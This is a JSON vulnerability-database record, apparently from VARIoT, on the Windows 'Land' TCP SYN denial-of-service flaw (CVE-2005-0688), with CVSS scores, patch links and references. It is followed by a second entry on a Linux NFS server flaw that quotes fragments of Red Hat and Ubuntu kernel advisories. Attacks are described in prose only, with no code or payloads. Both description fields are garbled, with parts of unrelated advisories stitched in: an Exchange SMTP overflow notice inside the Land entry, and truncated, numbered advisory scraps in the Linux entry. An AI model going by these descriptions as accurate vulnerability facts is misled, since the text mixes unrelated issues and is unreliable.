        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "windows nt sp5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp3 alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt sp6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "BID",
        "id": "13658"
      },
      {
        "db": "BID",
        "id": "2666"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000167"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200503-048"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-0688"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:sp2:tablet_pc:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:r2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2005-0688"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Dejan Levaja  dejan@levaja.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200503-048"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2005-0688",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2005-0688",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2005-0688",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#396645",
            "trust": 0.8,
            "value": "12.15"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#233754",
            "trust": 0.8,
            "value": "12.29"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#275193",
            "trust": 0.8,
            "value": "36.15"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200503-048",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000167"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200503-048"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-0688"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Windows Server 2003 and XP SP2, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, aka a reoccurrence of the \"Land\" vulnerability (CVE-1999-0016). Microsoft Windows does not adequately validate IP options, allowing an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service.  An attacker could take complete control of a vulnerable system.  When a packet of this sort is received, an infinite loop is  initiated and the affected system halts.  This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices \u0026amp; Catalyst switches, and HP-UX up to 11.00. \nIt is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. \n**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. \n----------------------------------------------------------------------\n\nWant a new IT Security job?\n\nVacant positions at Secunia:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nMicrosoft Exchange SMTP Service Extended Verb Request Buffer Overflow\n\nSECUNIA ADVISORY ID:\nSA14920\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/14920/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nSystem access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nMicrosoft Exchange Server 2000\nhttp://secunia.com/product/41/\nMicrosoft Exchange Server 2003\nhttp://secunia.com/product/1828/\n\nDESCRIPTION:\nISS X-Force has reported a vulnerability in Microsoft Exchange\nServer, which can be exploited by malicious people to compromise a\nvulnerable system. \n\nThe vulnerability is caused due to a boundary error in the SMTP\nservice within the handling of a certain extended verb request. This\ncan be exploited to cause a heap-based buffer overflow by connecting\nto the SMTP service and issuing a specially crafted command. \n\nSuccessful exploitation allows execution of arbitrary code with the\nprivileges of the SMTP service (by default \"Local System\"). Instead, this requires permissions\nusually only granted to other Exchange servers in a domain. \n\nSOLUTION:\nApply patches. \n\nMicrosoft Exchange 2000 Server (requires SP3):\nhttp://www.microsoft.com/downloads/details.aspx?FamilyId=2A2AF17E-2E4A-4479-8AC9-B5544EA0BD66\n\nMicrosoft Exchange Server 2003:\nhttp://www.microsoft.com/downloads/details.aspx?FamilyId=97F409EB-C8D0-4C94-A67B-5945E26C9267\n\nMicrosoft Exchange Server 2003 (requires SP1):\nhttp://www.microsoft.com/downloads/details.aspx?FamilyId=35BCE74A-E84A-4035-BF18-196368F032CC\n\nThe following versions are not affected:\n* Microsoft Exchange Server 5.5 SP4\n* Microsoft Exchange Server 5.0 SP2\n\nPROVIDED AND/OR DISCOVERED BY:\nMark Dowd and Ben Layer, ISS X-Force. \n\nORIGINAL ADVISORY:\nMS05-021 (KB894549):\nhttp://www.microsoft.com/technet/security/Bulletin/MS05-021.mspx\n\nISS X-Force:\nhttp://xforce.iss.net/xforce/alerts/id/193\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2005-0688"
      },
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000167"
      },
      {
        "db": "BID",
        "id": "13658"
      },
      {
        "db": "BID",
        "id": "2666"
      },
      {
        "db": "PACKETSTORM",
        "id": "37141"
      }
    ],
    "trust": 4.41
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2005-0688",
        "trust": 3.0
      },
      {
        "db": "SECUNIA",
        "id": "14512",
        "trust": 2.4
      },
      {
        "db": "USCERT",
        "id": "TA05-102A",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "22341",
        "trust": 1.6
      },
      {
        "db": "VUPEN",
        "id": "ADV-2006-3983",
        "trust": 1.6
      },
      {
        "db": "BID",
        "id": "2666",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "14920",
        "trust": 0.9
      },
      {
        "db": "OSVDB",
        "id": "14578",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "19593",
        "trust": 0.8
      },
      {
        "db": "CERT/CC",
        "id": "VU#396645",
        "trust": 0.8
      },
      {
        "db": "BID",
        "id": "13116",
        "trust": 0.8
      },
      {
        "db": "SECTRACK",
        "id": "1013686",
        "trust": 0.8
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754",
        "trust": 0.8
      },
      {
        "db": "OSVDB",
        "id": "15467",
        "trust": 0.8
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000167",
        "trust": 0.8
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:4978",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:1288",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:482",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:1685",
        "trust": 0.6
      },
      {
        "db": "MS",
        "id": "MS06-064",
        "trust": 0.6
      },
      {
        "db": "MS",
        "id": "MS05-019",
        "trust": 0.6
      },
      {
        "db": "HP",
        "id": "SSRT061264",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20050305 WINDOWS SERVER 2003 AND XP SP2 LAND ATTACK VULNERABILITY",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200503-048",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "13658",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "37141",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "BID",
        "id": "13658"
      },
      {
        "db": "BID",
        "id": "2666"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000167"
      },
      {
        "db": "PACKETSTORM",
        "id": "37141"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200503-048"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-0688"
      }
    ]
  },
  "id": "VAR-200503-0010",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.33667661
  },
  "last_update_date": "2024-07-23T19:39:25.692000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "MS06-064",
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms06-064.mspx"
      },
      {
        "title": "MS05-019",
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-019.mspx"
      },
      {
        "title": "MS05-019",
        "trust": 0.8,
        "url": "http://www.microsoft.com/japan/technet/security/bulletin/ms05-019.mspx"
      },
      {
        "title": "MS06-064",
        "trust": 0.8,
        "url": "http://www.microsoft.com/japan/technet/security/bulletin/ms06-064.mspx"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000167"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2005-0688"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-019.mspx"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/14512/"
      },
      {
        "trust": 1.6,
        "url": "http://www.us-cert.gov/cas/techalerts/ta05-102a.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/22341"
      },
      {
        "trust": 1.0,
        "url": "http://marc.info/?l=bugtraq\u0026m=111005099504081\u0026w=2"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/449179/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2006/3983"
      },
      {
        "trust": 1.0,
        "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-019"
      },
      {
        "trust": 1.0,
        "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-064"
      },
      {
        "trust": 1.0,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1288"
      },
      {
        "trust": 1.0,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1685"
      },
      {
        "trust": 1.0,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a482"
      },
      {
        "trust": 1.0,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a4978"
      },
      {
        "trust": 0.9,
        "url": "http://xforce.iss.net/xforce/alerts/id/193"
      },
      {
        "trust": 0.9,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-021.mspx"
      },
      {
        "trust": 0.9,
        "url": "http://secunia.com/advisories/14920/"
      },
      {
        "trust": 0.9,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms06-064.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/14512"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/2666 "
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/xfdb/19593"
      },
      {
        "trust": 0.8,
        "url": "http://osvdb.org/displayvuln.php?osvdb_id=14578"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/alerts/id/192"
      },
      {
        "trust": 0.8,
        "url": "http://www.iana.org/assignments/ip-parameters"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/13116/"
      },
      {
        "trust": 0.8,
        "url": "http://securitytracker.com/alerts/2005/apr/1013686.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.osvdb.org/displayvuln.php?osvdb_id=15467"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-0688"
      },
      {
        "trust": 0.8,
        "url": "http://www.ipa.go.jp/security/ciadr/vul/20050413-ms05-019.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.jpcert.or.jp/wr/2005/wr051601.txt"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnta05-102a/"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/tr/trta05-102a/"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2005-0688"
      },
      {
        "trust": 0.8,
        "url": "http://www.securiteam.com/windowsntfocus/5pp0720f5u.html"
      },
      {
        "trust": 0.6,
        "url": "http://support.microsoft.com/support/kb/articles/q165/0/05.asp"
      },
      {
        "trust": 0.6,
        "url": "http://support.microsoft.com/support/kb/articles/q177/5/39.asp"
      },
      {
        "trust": 0.6,
        "url": "http://support.novell.com/cgi-bin/search/tidfinder.cgi?2932511"
      },
      {
        "trust": 0.6,
        "url": "http://www.cisco.com/warp/public/770/land-pub.shtml#iosvers"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/392354"
      },
      {
        "trust": 0.6,
        "url": "/archive/1/392642"
      },
      {
        "trust": 0.6,
        "url": "/archive/1/393045"
      },
      {
        "trust": 0.6,
        "url": "/archive/1/392354"
      },
      {
        "trust": 0.6,
        "url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=111005099504081\u0026w=2"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/449179/100/0/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2006/3983"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:4978"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:482"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:1685"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:1288"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/elmodocs2/security/asa-2006-217.htm"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/400188"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=35bce74a-e84a-4035-bf18-196368f032cc"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=2a2af17e-2e4a-4479-8ac9-b5544ea0bd66"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_vacancies/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/41/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/downloads/details.aspx?familyid=97f409eb-c8d0-4c94-a67b-5945e26c9267"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/1828/"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "BID",
        "id": "13658"
      },
      {
        "db": "BID",
        "id": "2666"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000167"
      },
      {
        "db": "PACKETSTORM",
        "id": "37141"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200503-048"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-0688"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "BID",
        "id": "13658"
      },
      {
        "db": "BID",
        "id": "2666"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000167"
      },
      {
        "db": "PACKETSTORM",
        "id": "37141"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200503-048"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-0688"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2005-04-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "date": "2005-04-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "date": "2005-04-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "date": "2005-05-17T00:00:00",
        "db": "BID",
        "id": "13658"
      },
      {
        "date": "1997-11-20T00:00:00",
        "db": "BID",
        "id": "2666"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2005-000167"
      },
      {
        "date": "2005-04-18T07:20:47",
        "db": "PACKETSTORM",
        "id": "37141"
      },
      {
        "date": "1997-11-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200503-048"
      },
      {
        "date": "2005-03-05T05:00:00",
        "db": "NVD",
        "id": "CVE-2005-0688"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2005-04-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "date": "2005-05-03T00:00:00",
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "date": "2005-08-02T00:00:00",
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "date": "2016-07-06T14:40:00",
        "db": "BID",
        "id": "13658"
      },
      {
        "date": "2009-07-11T06:06:00",
        "db": "BID",
        "id": "2666"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2005-000167"
      },
      {
        "date": "2005-10-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200503-048"
      },
      {
        "date": "2018-10-19T15:31:16.513000",
        "db": "NVD",
        "id": "CVE-2005-0688"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "13658"
      },
      {
        "db": "BID",
        "id": "2666"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Microsoft Windows vulnerable to DoS via LAND attack",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Failure to Handle Exceptional Conditions",
    "sources": [
      {
        "db": "BID",
        "id": "13658"
      },
      {
        "db": "BID",
        "id": "2666"
      }
    ],
    "trust": 0.6
  }
}

var-201704-1397
Vulnerability from variot

The NFSv2 and NFSv3 server implementations in the Linux kernel through 4.10.13 lack certain checks for the end of a buffer, which allows remote attackers to trigger pointer-arithmetic errors or possibly have unspecified other impact via crafted requests, related to fs/nfsd/nfs3xdr.c and fs/nfsd/nfsxdr.c. Linux Kernel is prone to multiple security-bypass vulnerabilities. Attackers can exploit these issues to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks. 7) - noarch, x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is a kernel-side mitigation which increases the stack guard gap size from one page to 1 MiB to make successful exploitation of this issue more difficult.

Bug Fix(es):

  • The kernel-rt packages have been upgraded to the 3.10.0-514.25.2 source tree, which provides a number of bug fixes over the previous version. (BZ#1452742)

  • Previously, a local lock acquisition around the ip_send_unicast_reply() function was incorrectly terminated. Consequently, a list corruption occurred that led to a kernel panic. This update adds locking functions around calls to ip_send_unicast_reply(). (BZ#1455239)

  • 7.2) - ppc64, ppc64le, x86_64

Bug Fix(es):

  • Previously, a race condition between Linux kernel module error handling and kprobe registration code existed in the Linux kernel. The protection that was applied during module error handling code could be overridden by kprobe registration code before the module was deallocated. Consequently, the mapped page could be freed and become not 'writable'. (BZ#1454683)

  • Due to a race with another NFS mount, the nfs41_walk_client_list() function previously established a lease on the nfs_client pointer before the check for trunking was finished. This update ensures the processes follow the correct order and the race no longer occurs in this scenario. (BZ#1447383)

  • If a duplicate IPv6 address or an issue setting an address was present in the net/ipv6/addrconf.c file, a race condition occurred that could cause an IFP refcount leak. Attempts to unregister a netdevice then produced "Unregister Netdevice Failed" error messages. (BZ#1449103)

  • Previously, subtracting from vCPU threads could cause a steal_time overflow on QEMU live migration. This update makes sure steal_time accumulation to vCPU entry time is moved before copying steal_time data to QEMU guest, thus fixing this bug. (BZ#1274919)

  • On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely.

Bug Fix(es):

  • Previously, while the MAP_GROWSDOWN flag was set, writing to the memory which was mapped with the mmap system call failed with the SIGBUS signal. (BZ#1474720)

4.

Ubuntu Security Notice USN-3312-1 June 07, 2017

linux, linux-aws, linux-gke, linux-raspi2, linux-snapdragon vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in the Linux kernel. (CVE-2016-7917)

Qian Zhang discovered a heap-based buffer overflow in the tipc_msg_build() function in the Linux kernel. (CVE-2016-8632)

It was discovered that the keyring implementation in the Linux kernel in some situations did not prevent special internal keyrings from being joined by userspace keyrings. A privileged local attacker could use this to bypass module verification. A privileged local attacker could use this to execute arbitrary code. (CVE-2017-0605)

Dmitry Vyukov discovered that KVM implementation in the Linux kernel improperly emulated the VMXON instruction. A local attacker in a guest OS could use this to cause a denial of service (memory consumption) in the host OS. (CVE-2017-6001)

Eric Biggers discovered a memory leak in the keyring implementation in the Linux kernel. (CVE-2017-7472)

Sabrina Dubroca discovered that the asynchronous cryptographic hash (ahash) implementation in the Linux kernel did not properly handle a full request queue. (CVE-2017-7645)

Tommi Rantala and Brad Spengler discovered that the memory manager in the Linux kernel did not properly enforce the CONFIG_STRICT_DEVMEM protection mechanism. A local attacker with access to /dev/mem could use this to expose sensitive information or possibly execute arbitrary code. (CVE-2016-7913)

